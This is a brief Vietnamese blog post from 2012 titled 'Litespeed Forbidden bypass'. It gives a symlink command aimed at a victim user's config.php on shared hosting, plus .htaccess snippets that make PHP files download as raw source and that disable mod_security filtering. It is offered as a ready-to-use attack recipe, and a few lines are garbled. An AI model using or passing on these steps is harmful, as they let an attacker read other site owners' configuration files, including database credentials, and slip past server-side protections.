Thứ Bảy, 16 tháng 6, 2012

Litespeed Forbidden bypass

ln -s /home/victimuser/public_html/config.php test.shtml
.htaccess:
Options +FollowSymLinks
DirectoryIndex seees.html
RemoveHandler .php
AddType application/octet-stream .php 
htaccess for Bypass LiteSpeed ُServer 2.6.18
<Files *.php>
ForceType application/x-httpd-php4
</Files>
ahm tas: <ifModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule> 
Litespeed 403 access
.Htaccess
<Files *.php>
ForceType application/x-httpd-php4
</Files>
<ahm tas: <ifModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

Không có nhận xét nào: